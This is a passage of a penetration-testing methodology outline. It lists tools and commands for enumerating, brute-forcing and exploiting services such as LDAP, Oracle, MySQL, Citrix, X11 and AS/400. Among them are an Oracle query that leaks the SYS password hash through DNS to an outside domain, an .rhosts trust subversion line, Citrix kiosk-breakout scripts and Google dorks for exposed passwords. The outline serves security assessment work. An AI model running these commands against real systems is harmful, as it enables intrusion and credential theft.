12.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
12.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
12.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
12.14.2. ldap brute force
12.14.2.1. bf_ldap
12.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
12.14.2.1.2. Optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)
12.14.2.2. K0ldS
12.14.2.3. LDAP_Brute.pl
12.14.3. Examine Configuration Files
12.14.3.1. General
12.14.3.1.1. containers.ldif
12.14.3.1.2. ldap.cfg
12.14.3.1.3. ldap.conf
12.14.3.1.4. ldap.xml
12.14.3.1.5. ldap-config.xml
12.14.3.1.6. ldap-realm.xml
12.14.3.1.7. slapd.conf
12.14.3.2. IBM SecureWay V3 server
12.14.3.2.1. V3.sas.oc
12.14.3.3. Microsoft Active Directory server
12.14.3.3.1. msadClassesAttrs.ldif
12.14.3.4. Netscape Directory Server 4
12.14.3.4.1. nsslapd.sas_at.conf
12.14.3.4.2. nsslapd.sas_oc.conf
12.14.3.5. OpenLDAP directory server
12.14.3.5.1. slapd.sas_at.conf
12.14.3.5.2. slapd.sas_oc.conf
12.14.3.6. Sun ONE Directory Server 5.1
12.14.3.6.1. 75sas.ldif
12.15. PPTP/L2TP/VPN port 500/1723 open
12.15.1. Enumeration
12.15.1.1. ike-scan
12.15.1.2. ike-probe
12.15.2. Brute-Force
12.15.2.1. ike-crack
12.15.3. Reference Material
12.15.3.1. PSK cracking paper
12.15.3.2. SecurityFocus Infocus
12.15.3.3. Scanning a VPN Implementation
12.16. Modbus port 502 open
12.16.1. modscan
12.17. rlogin port 513 open
12.17.1. Rlogin Enumeration
12.17.1.1. Find the files
12.17.1.1.1. find / -name .rhosts
12.17.1.1.2. locate .rhosts
12.17.1.2. Examine Files
12.17.1.2.1. cat .rhosts
12.17.1.3. Manual Login
12.17.1.3.1. rlogin hostname -l username
12.17.1.3.2. rlogin <IP>
12.17.1.4. Subvert the files
12.17.1.4.1. echo ++ > .rhosts
12.17.2. Rlogin Brute force
12.17.2.1. Hydra
12.18. rsh port 514 open
12.18.1. Rsh Enumeration
12.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
12.18.2. Rsh Brute Force
12.18.2.1. rsh-grind
12.18.2.2. Hydra
12.18.2.3. medusa
12.19. SQL Server Ports 1433, 1434 open
12.19.1. SQL Enumeration
12.19.1.1. piggy
12.19.1.2. SQLPing
12.19.1.2.1. sqlping ip_address/hostname
12.19.1.3. SQLPing2
12.19.1.4. SQLPing3
12.19.1.5. SQLpoke
12.19.1.6. SQL Recon
12.19.1.7. SQLver
12.19.2. SQL Brute Force
12.19.2.1. SQLPAT
12.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
12.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
12.19.2.2. SQL Dict
12.19.2.3. SQLAT
12.19.2.4. Hydra
12.19.2.5. SQLlhf
12.19.2.6. ForceSQL
12.20. Citrix port 1494 open
12.20.1. Citrix Enumeration
12.20.1.1. Default Domain
12.20.1.2. Published Applications
12.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
12.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
12.20.2. Citrix Brute Force
12.20.2.1. bforce.js
12.20.2.2. connect.js
12.20.2.3. Citrix Brute-forcer
12.20.2.4. Reference Material
12.20.2.4.1. Hacking Citrix - the legitimate backdoor
12.20.2.4.2. Hacking Citrix - the forceful way
12.21. Oracle Port 1521 Open
12.21.1. Oracle Enumeration
12.21.1.1. oracsec
12.21.1.2. Repscan
12.21.1.3. Sidguess
12.21.1.4. Scuba
12.21.1.5. DNS/HTTP Enumeration
12.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
12.21.1.6. WinSID
12.21.1.7. Oracle default password list
12.21.1.8. TNSVer
12.21.1.8.1. tnsver host [port]
12.21.1.9. TCP Scan
12.21.1.10. Oracle TNSLSNR
12.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
12.21.1.11. TNSCmd
12.21.1.11.1. perl tnscmd.pl -h ip_address
12.21.1.11.2. perl tnscmd.pl version -h ip_address
12.21.1.11.3. perl tnscmd.pl status -h ip_address
12.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
12.21.1.12. LSNrCheck
12.21.1.13. Oracle Security Check (needs credentials)
12.21.1.14. OAT
12.21.1.14.1. sh opwg.sh -s ip_address
12.21.1.14.2. opwg.bat -s ip_address
12.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
12.21.1.15. OScanner
12.21.1.15.1. sh oscanner.sh -s ip_address
12.21.1.15.2. oscanner.exe -s ip_address
12.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
12.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
12.21.1.16. NGS Squirrel for Oracle
12.21.1.17. Service Register
12.21.1.17.1. Service-register.exe ip_address
12.21.1.18. PLSQL Scanner 2008
12.21.2. Oracle Brute Force
12.21.2.1. OAK
12.21.2.1.1. ora-getsid hostname port sid_dictionary_list
12.21.2.1.2. ora-auth-alter-session host port sid username password sql
12.21.2.1.3. ora-brutesid host port start
12.21.2.1.4. ora-pwdbrute host port sid username password-file
12.21.2.1.5. ora-userenum host port sid userlistfile
12.21.2.1.6. ora-ver -e (-f -l -a) host port
12.21.2.2. breakable (Targets Application Server Port)
12.21.2.2.1. breakable.exe host url [port] [v]
12.21.2.2.2. host: ip_address of the Oracle Portal Server
12.21.2.2.3. url: PATH_INFO, i.e. /pls/orasso
12.21.2.2.4. port: TCP port the Oracle Portal Server is serving pages from
12.21.2.2.5. v: verbose
12.21.2.3. SQLInjector (Targets Application Server Port)
12.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
12.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
12.21.2.4. Check Password
12.21.2.5. orabf
12.21.2.5.1. orabf [hash]:[username] [options]
12.21.2.6. thc-orakel
12.21.2.6.1. Cracker
12.21.2.6.2. Client
12.21.2.6.3. Crypto
12.21.2.7. DBVisualisor
12.21.2.7.1. Sql scripts from pentest.co.uk
12.21.2.7.2. Manual SQL input of previously reported vulnerabilities
12.21.3. Oracle Reference Material
12.21.3.1. Understanding SQL Injection
12.21.3.2. SQL Injection walkthrough
12.21.3.3. SQL Injection by example
12.21.3.4. Advanced SQL Injection in Oracle databases
12.21.3.5. Blind SQL Injection
12.21.3.6. SQL Cheatsheets
12.22. NFS Port 2049 open
12.22.1. NFS Enumeration
12.22.1.1. showmount -e hostname/ip_address
12.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
12.22.2. NFS Brute Force
12.22.2.1. Interact with NFS share and try to add/delete
12.22.2.2. Exploit and Confuse Unix
12.22.3. Examine Configuration Files
12.22.3.1. /etc/exports
12.22.3.2. /etc/lib/nfs/xtab
12.22.4. nmap nse script
12.22.4.1. nfs-showmount
12.23. Compaq/HP Insight Manager Port 2301,2381open
12.23.1. HP Enumeration
12.23.1.1. Authentication Method
12.23.1.1.1. Host OS Authentication
12.23.1.1.2. Default Authentication
12.23.1.2. Wikto
12.23.1.3. Nstealth
12.23.2. HP Bruteforce
12.23.2.1. Hydra
12.23.2.2. Acunetix
12.23.3. Examine Configuration Files
12.23.3.1. path.properties
12.23.3.2. mx.log
12.23.3.3. CLIClientConfig.cfg
12.23.3.4. database.props
12.23.3.5. pg_hba.conf
12.23.3.6. jboss-service.xml
12.23.3.7. .namazurc
12.24. MySQL port 3306 open
12.24.1. Enumeration
12.24.1.1. nmap -A -n -p3306 <IP Address>
12.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
12.24.1.3. telnet IP_Address 3306
12.24.1.4. use test; select * from test;
12.24.1.5. To check for other DB's -- show databases
12.24.2. Administration
12.24.2.1. MySQL Network Scanner
12.24.2.2. MySQL GUI Tools
12.24.2.3. mysqlshow
12.24.2.4. mysqlbinlog
12.24.3. Manual Checks
12.24.3.1. Default usernames and passwords
12.24.3.1.1. username: root password:
12.24.3.1.2. testing
12.24.3.2. Configuration Files
12.24.3.2.1. Operating System
12.24.3.2.2. Command History
12.24.3.2.3. Log Files
12.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
12.24.3.2.5. MySQL data directory (Location specified in my.cnf)
12.24.3.2.6. SSL Check
12.24.3.3. Privilege Escalation
12.24.3.3.1. Current Level of access
12.24.3.3.2. Access passwords
12.24.3.3.3. Create a new user and grant him privileges
12.24.3.3.4. Break into a shell
12.24.4. SQL injection
12.24.4.1. mysql-miner.pl
12.24.4.1.1. mysql-miner.pl http://target/ expected_string database
12.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
12.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
12.24.5. References.
12.24.5.1. Design Weaknesses
12.24.5.1.1. MySQL running as root
12.24.5.1.2. Exposed publicly on Internet
12.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
12.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
12.25. RDesktop port 3389 open
12.25.1. Rdesktop Enumeration
12.25.1.1. Remote Desktop Connection
12.25.2. Rdestop Bruteforce
12.25.2.1. TSGrinder
12.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
12.25.2.2. Tscrack
12.26. Sybase Port 5000+ open
12.26.1. Sybase Enumeration
12.26.1.1. sybase-version ip_address from NGS
12.26.2. Sybase Vulnerability Assessment
12.26.2.1. Use DBVisualiser
12.26.2.1.1. Sybase Security checksheet
12.26.2.1.2. Manual SQL input of previously reported vulnerabilities
12.26.2.2. NGS Squirrel for Sybase
12.27. SIP Port 5060 open
12.27.1. SIP Enumeration
12.27.1.1. netcat
12.27.1.1.1. nc IP_Address Port
12.27.1.2. sipflanker
12.27.1.2.1. python sipflanker.py 192.168.1-254
12.27.1.3. Sipscan
12.27.1.4. smap
12.27.1.4.1. smap IP_Address/Subnet_Mask
12.27.1.4.2. smap -o IP_Address/Subnet_Mask
12.27.1.4.3. smap -l IP_Address
12.27.2. SIP Packet Crafting etc.
12.27.2.1. sipsak
12.27.2.1.1. Tracing paths:- sipsak -T -s sip:username@domain
12.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
12.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
12.27.2.2. siprogue
12.27.3. SIP Vulnerability Scanning/ Brute Force
12.27.3.1. tftp bruteforcer
12.27.3.1.1. Default dictionary file
12.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
12.27.3.2. VoIPaudit
12.27.3.3. SiVuS
12.27.4. Examine Configuration Files
12.27.4.1. SIPDefault.cnf
12.27.4.2. asterisk.conf
12.27.4.3. sip.conf
12.27.4.4. phone.conf
12.27.4.5. sip_notify.conf
12.27.4.6. <Ethernet address>.cfg
12.27.4.7. 000000000000.cfg
12.27.4.8. phone1.cfg
12.27.4.9. sip.cfg etc. etc.
12.28. VNC port 5900^ open
12.28.1. VNC Enumeration
12.28.1.1. Scans
12.28.1.1.1. 5900^ for direct access; 5800 for HTTP access.
12.28.2. VNC Brute Force
12.28.2.1. Password Attacks
12.28.2.1.1. Remote
12.28.2.1.2. Local
12.28.3. Examine Configuration Files
12.28.3.1. .vnc
12.28.3.2. /etc/vnc/config
12.28.3.3. $HOME/.vnc/config
12.28.3.4. /etc/sysconfig/vncservers
12.28.3.5. /etc/vnc.conf
12.29. Tor Port 9001, 9030 open
12.29.1. Tor Node Checker
12.29.1.1. Ip Pages
12.29.1.2. Kewlio.net
12.29.2. nmap NSE script
12.30. Jet Direct 9100 open
12.30.1. hijetta
13. X11 port 6000^ open
13.1. X11 Enumeration
13.1.1. List open windows
13.1.2. Authentication Method
13.1.2.1. Xauth
13.1.2.2. Xhost
13.2. X11 Exploitation
13.2.1. xwd
13.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
13.2.2. Keystrokes
13.2.2.1. Received
13.2.2.2. Transmitted
13.2.3. Screenshots
13.2.4. xhost +
13.3. Examine Configuration Files
13.3.1. /etc/Xn.hosts
13.3.2. /usr/lib/X11/xdm
13.3.2.1. Untitled
13.3.3. /usr/lib/X11/xdm/xsession
13.3.4. /usr/lib/X11/xdm/xsession-remote
13.3.5. /usr/lib/X11/xdm/xsession.0
13.3.6. /usr/lib/X11/xdm/xdm-config
13.3.6.1. DisplayManager*authorize:on
14. inurl:Citrix/AccessPlatform/auth/login.aspx
15. Citrix Specific Testing
15.1. Citrix provides remote access services to multiple users across a wide range of platforms. I have put together the following information, which will hopefully help you conduct a vulnerability assessment/penetration test against Citrix.
15.2. Enumeration
15.2.1. web search
15.2.1.1. Google (GHDB)
15.2.1.1.1. ext:ica
15.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
15.2.1.1.3. [WFClient] Password= filetype:ica
15.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
15.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
15.2.1.1.6. inurl:/Citrix/Nfuse17/
15.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
15.2.1.2. Google Hacks (Author Discovered)
15.2.1.2.1. filetype:ica Username=
15.2.1.2.2. inurl:/Citrix/AccessPlatform/
15.2.1.2.3. inurl:LogonAgent/Login.asp
15.2.1.2.4. inurl:/CITRIX/NFUSE/default/login.asp
15.2.1.2.5. inurl:/Citrix/NFuse161/login.asp
15.2.1.2.6. inurl:/Citrix/NFuse16
15.2.1.2.7. inurl:/Citrix/NFuse151/
15.2.1.2.8. allintitle:MetaFrame XP Login
15.2.1.2.9. allintitle:MetaFrame Presentation Server Login
15.2.1.2.10. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
15.2.1.2.11. allintitle:Citrix(R) NFuse(TM) Classic Login
15.2.1.3. Yahoo
15.2.1.3.1. originurlextension:ica
15.2.2. site search
15.2.2.1. Manual
15.2.2.1.1. review web page for useful information
15.2.2.1.2. review source for web page
15.2.3. generic
15.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
15.2.3.2. amap -bqv ip_address port_no.
15.2.4. citrix specific
15.2.4.1. enum.pl
15.2.4.1.1. perl enum.pl ip_address
15.2.4.2. enum.js
15.2.4.2.1. enum.js apps TCPBrowserAddress=ip_address
15.2.4.3. connect.js
15.2.4.3.1. connect.js TCPBrowserAddress=ip_address Application=advertised-application
15.2.4.4. Citrix-pa-scan
15.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
15.2.4.5. pabrute.c
15.2.4.5.1. ./pabrute pubapp list app_list ip_address
15.2.5. Default Ports
15.2.5.1. TCP
15.2.5.1.1. Citrix XML Service
15.2.5.1.2. Advanced Management Console
15.2.5.1.3. Citrix SSL Relay
15.2.5.1.4. ICA sessions
15.2.5.1.5. Server to server
15.2.5.1.6. Management Console to server
15.2.5.1.7. Session Reliability (Auto-reconnect)
15.2.5.1.8. License Management Console
15.2.5.1.9. License server
15.2.5.2. UDP
15.2.5.2.1. Clients to ICA browser service
15.2.5.2.2. Server-to-server
15.2.6. nmap nse scripts
15.2.6.1. citrix-enum-apps
15.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
15.2.6.2. citrix-enum-apps-xml
15.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
15.2.6.3. citrix-enum-servers
15.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
15.2.6.4. citrix-enum-servers-xml
15.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
15.2.6.5. citrix-brute-xml
15.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
15.3. Scanning
15.3.1. Nessus
15.3.1.1. Plugins
15.3.1.1.1. CGI abuses
15.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
15.3.1.1.3. Misc.
15.3.1.1.4. Service Detection
15.3.1.1.5. Web Servers
15.3.1.1.6. Windows
15.3.2. Nikto
15.3.2.1. perl nikto.pl -host ip_address -port port_no.
15.3.2.1.1. Untitled
15.4. Exploitation
15.4.1. Alter default .ica files
15.4.1.1. InitialProgram=cmd.exe
15.4.1.2. InitialProgram=explorer.exe
15.4.2. Enumerate and Connect
15.4.2.1. For applications identified by Citrix-pa-scan
15.4.2.1.1. Pas
15.4.2.2. For published applications with a Citrix client when the master browser is non-public.
15.4.2.2.1. Citrix-pa-proxy
15.4.3. Manual Testing
15.4.3.1. Create Batch File (cmd.bat)
15.4.3.1.1. 1
15.4.3.1.2. 2
15.4.3.2. Host Scripting File (cmd.vbs)
15.4.3.2.1. Option Explicit
15.4.3.2.2. Dim objShell
15.4.3.2.3. objShell.Run "%comspec% /k"
15.4.3.2.4. WScript.Quit
15.4.3.2.5. alternative functionality
15.4.3.3. iKat
15.4.3.3.1. Integrated Kiosk Attack Tool
15.4.3.4. AT Command - privilege escalation
15.4.3.4.1. AT HH:MM /interactive "cmd.exe"
15.4.3.4.2. AT HH:MM /interactive %comspec% /k
15.4.3.4.3. Untitled
15.4.3.5. Keyboard Shortcuts/ Hotkeys
15.4.3.5.1. Ctrl + h – View History
15.4.3.5.2. Ctrl + n – New Browser
15.4.3.5.3. Shift + Left Click – New Browser
15.4.3.5.4. Ctrl + o – Internet Address (browse feature)
15.4.3.5.5. Ctrl + p – Print (to file)
15.4.3.5.6. Right Click (Shift + F10)
15.4.3.5.7. F1 – Jump to URL
15.4.3.5.8. SHIFT+F1: Local Task List
15.4.3.5.9. SHIFT+F2: Toggle Title Bar
15.4.3.5.10. SHIFT+F3: Close Remote Application
15.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
15.4.3.5.12. CTRL+F2: Remote Task List
15.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
15.4.3.5.14. ALT+F2: Cycle through programs
15.4.3.5.15. ALT+PLUS: Alt+TAB
15.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB
15.5. Brute Force
15.5.1. bforce.js
15.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2
15.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt
15.5.1.3. Untitled
15.6. Review Configuration Files
15.6.1. Application server configuration file
15.6.1.1. appsrv.ini
15.6.1.1.1. Location
15.6.1.1.2. World writeable
15.6.1.1.3. Review other files
15.6.1.1.4. Sample file
15.6.2. Program Neighborhood configuration file
15.6.2.1. pn.ini
15.6.2.1.1. Location
15.6.2.1.2. Review other files
15.6.2.1.3. Sample file
15.6.3. Citrix ICA client configuration file
15.6.3.1. wfclient.ini
15.6.3.1.1. Location
15.7. References
15.7.1. Vulnerabilities
15.7.1.1. Art of Hacking
15.7.1.2. Common Vulnerabilities and Exploits (CVE)
15.7.1.2.1. Sample file
15.7.1.2.2. Untitled
15.7.1.2.3. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix
15.7.1.3. OSVDB
15.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia
15.7.1.4. Secunia
15.7.1.5. Security-database.com
15.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix
15.7.1.6. SecurityFocus
15.7.2. Support
15.7.2.1. Citrix
15.7.2.1.1. Knowledge Base
15.7.2.2. Thinworld
15.7.3. Exploits
15.7.3.1. Milw0rm
15.7.3.1.1. http://www.milw0rm.com/search.php
15.7.3.2. Art of Hacking
15.7.3.2.1. Citrix
15.7.4. Tools Resource
15.7.4.1. Zip file containing the majority of the tools mentioned in this article, for easy download/access
16. Network Backbone
16.1. Generic Toolset
16.1.1. Wireshark (Formerly Ethereal)
16.1.1.1. Passive Sniffing
16.1.1.1.1. Usernames/Passwords
16.1.1.1.2. Email
16.1.1.1.3. FTP
16.1.1.1.4. HTTP
16.1.1.1.5. HTTPS
16.1.1.1.6. RDP
16.1.1.1.7. VOIP
16.1.1.1.8. Other
16.1.1.2. Filters
16.1.1.2.1. ip.src == ip_address
16.1.1.2.2. ip.dst == ip_address
16.1.1.2.3. tcp.dstport == port_no.
16.1.1.2.4. ! ip.addr == ip_address
16.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)
16.1.2. Cain & Abel
16.1.2.1. Active Sniffing
16.1.2.1.1. ARP Cache Poisoning
16.1.2.1.2. DNS Poisoning
16.1.2.1.3. Routing Protocols
16.1.3. Cisco-Torch
16.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>
16.1.4. NTP-Fingerprint
16.1.4.1. perl ntp-fingerprint.pl -t [ip_address]
16.1.5. Yersinia
16.1.6. p0f
16.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]
16.1.7. Manual Check (Credentials required)
16.1.8. MAC Spoofing
16.1.8.1. mac address changer for windows
16.1.8.2. macchanger
16.1.8.2.1. Random Mac Address:- macchanger -r eth0
16.1.8.3. madmacs
16.1.8.4. smac
16.1.8.5. TMAC
17. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that, if used, could lead to privilege escalation or denial of service against the computer system being attacked. Exploits can be compiled and used manually, or one of several exploitation engines can be used; at their simplest these are pre-compiled point-and-shoot tools, but they also offer a number of extra underlying features for more advanced users.
17.1. Password Attacks
17.1.1. Known Accounts
17.1.1.1. Identified Passwords
17.1.1.2. Unidentified Hashes
17.1.2. Default Accounts
17.1.2.1. Identified Passwords
17.1.2.2. Unidentified Hashes
17.2. Exploits
17.2.1. Successful Exploits
17.2.1.1. Accounts
17.2.1.1.1. Passwords
17.2.1.1.2. Groups
17.2.1.1.3. Other Details
17.2.1.2. Services
17.2.1.3. Backdoor
17.2.1.4. Connectivity
17.2.2. Unsuccessful Exploits
17.2.3. Resources
17.2.3.1. Securiteam
17.2.3.1.1. Exploits are sorted by year and must be downloaded individually
17.2.3.2. SecurityForest
17.2.3.2.1. Updated via CVS after initial install
17.2.3.3. GovernmentSecurity
17.2.3.3.1. Need to create an account to obtain access
17.2.3.4. Red Base Security
17.2.3.4.1. Oracle Exploit site only
17.2.3.5. Wireless Vulnerabilities & Exploits (WVE)
17.2.3.5.1. Wireless Exploit Site
17.2.3.6. PacketStorm Security
17.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.
17.2.3.7. SecWatch
17.2.3.7.1. Exploits sorted by year and month, download separately
17.2.3.8. SecurityFocus
17.2.3.8.1. Exploits must be downloaded individually
17.2.3.9. Metasploit
17.2.3.9.1. Install and regularly update via svn
17.2.3.10. Milw0rm
17.2.3.10.1. Exploit archive indexed and sorted by port, downloadable as a whole - The one to go for!
17.3. Tools
17.3.1. Metasploit
17.3.1.1. Free Extra Modules
17.3.1.1.1. local copy
17.3.2. Manual SQL Injection
17.3.2.1. Understanding SQL Injection
17.3.2.2. SQL Injection walkthrough
17.3.2.3. SQL Injection by example
17.3.2.4. Blind SQL Injection
17.3.2.5. Advanced SQL Injection in SQL Server
17.3.2.6. More Advanced SQL Injection
17.3.2.7. Advanced SQL Injection in Oracle databases
17.3.2.8. SQL Cheatsheets
17.3.2.8.1. Untitled
17.3.3. SQL Power Injector
17.3.4. SecurityForest
17.3.5. SPI Dynamics WebInspect
17.3.6. Core Impact
17.3.7. Cisco Global Exploiter
17.3.8. PIXDos
17.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
17.3.9. CANVAS
17.3.10. Inguma
18. Contributors
18.1. Matt Byrne (WirelessDefence.org)
18.1.1. Matt contributed the majority of the Wireless section.
18.2. Arvind Doraiswamy (Paladion.net)
18.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.
18.3. Lee Lawson (Dns.co.uk)
18.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.
18.4. Nabil OUCHN (Security-database.com)
19. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released, and the result is reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
19.1. Manual
19.1.1. Patch Levels
19.1.2. Confirmed Vulnerabilities
19.1.2.1. Severe
19.1.2.2. High
19.1.2.3. Medium
19.1.2.4. Low
19.2. Automated
19.2.1. Reports
19.2.2. Vulnerabilities
19.2.2.1. Severe
19.2.2.2. High
19.2.2.3. Medium
19.2.2.4. Low
19.3. Tools
19.3.1. GFI
19.3.2. Nessus (Linux)
19.3.2.1. Nessus (Windows)
19.3.3. NGS Typhon
19.3.4. NGS Squirrel for Oracle
19.3.5. NGS Squirrel for SQL
19.3.6. SARA
19.3.7. MatriXay
19.3.8. BiDiBlah
19.3.9. SSA
19.3.10. Oval Interpreter
19.3.11. Xscan
19.3.12. Security Manager +
19.3.13. Inguma
19.4. Resources
19.4.1. Security Focus
19.4.2. Microsoft Security Bulletin
19.4.3. Common Vulnerabilities and Exploits (CVE)
19.4.4. National Vulnerability Database (NVD)
19.4.5. The Open Source Vulnerability Database (OSVDB)
19.4.5.1. Standalone Database
19.4.5.1.1. Update URL
19.4.6. United States Computer Emergency Response Team (US-CERT)
19.4.7. Computer Emergency Response Team
19.4.8. Mozilla Security Information
19.4.9. SANS
19.4.10. Securiteam
19.4.11. PacketStorm Security
19.4.12. Security Tracker
19.4.13. Secunia
19.4.14. Vulnerabilities.org
19.4.15. ntbugtraq
19.4.16. Wireless Vulnerabilities and Exploits (WVE)
19.5. Blogs
19.5.1. Carnal0wnage
19.5.2. Fsecure Blog
19.5.3. g0ne blog
19.5.4. GNUCitizen
19.5.5. ha.ckers Blog
19.5.6. Jeremiah Grossman Blog
19.5.7. Metasploit
19.5.8. nCircle Blogs
19.5.9. pentestmonkey.net
19.5.10. Rational Security
19.5.12. Rise Security
19.5.13. Security Fix Blog
19.5.14. Software Vulnerability Exploitation Blog
19.5.16. Taosecurity Blog
20. AS/400 Auditing
20.1. Remote
20.1.1. Information Gathering
20.1.1.1. Nmap using common iSeries (AS/400) services.
20.1.1.1.1. Unsecured services (Port;name;description)
20.1.1.1.2. Secured services (Port;name;description)
20.1.1.2. NetCat (old school technique)
20.1.1.2.1. nc -v -z -w <timeout_secs> target ListOfServices.txt | grep "open"
20.1.1.3. Banners Grabbing
20.1.1.3.1. Telnet
20.1.1.3.2. FTP
20.1.1.3.3. HTTP Banner
20.1.1.3.4. POP3
20.1.1.3.5. SNMP
20.1.1.3.6. SMTP
20.1.2. Users Enumeration
20.1.2.1. Default AS/400 users accounts
20.1.2.2. Error messages
20.1.2.2.1. Telnet Login errors
20.1.2.2.2. POP3 authentication Errors
20.1.2.3. Qsys symbolic link (if ftp is enabled)
20.1.2.3.1. ftp target | quote stat | quote site namefmt 1
20.1.2.3.2. cd /
20.1.2.3.3. quote site listfmt 1
20.1.2.3.4. mkdir temp
20.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
20.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
20.1.2.3.7. dir /temp/qsys/*.usrprf
20.1.2.4. LDAP
20.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
20.1.2.4.2. Tool to browse LDAP
20.1.3. Exploitation
20.1.3.1. CVE References
20.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
20.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
20.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
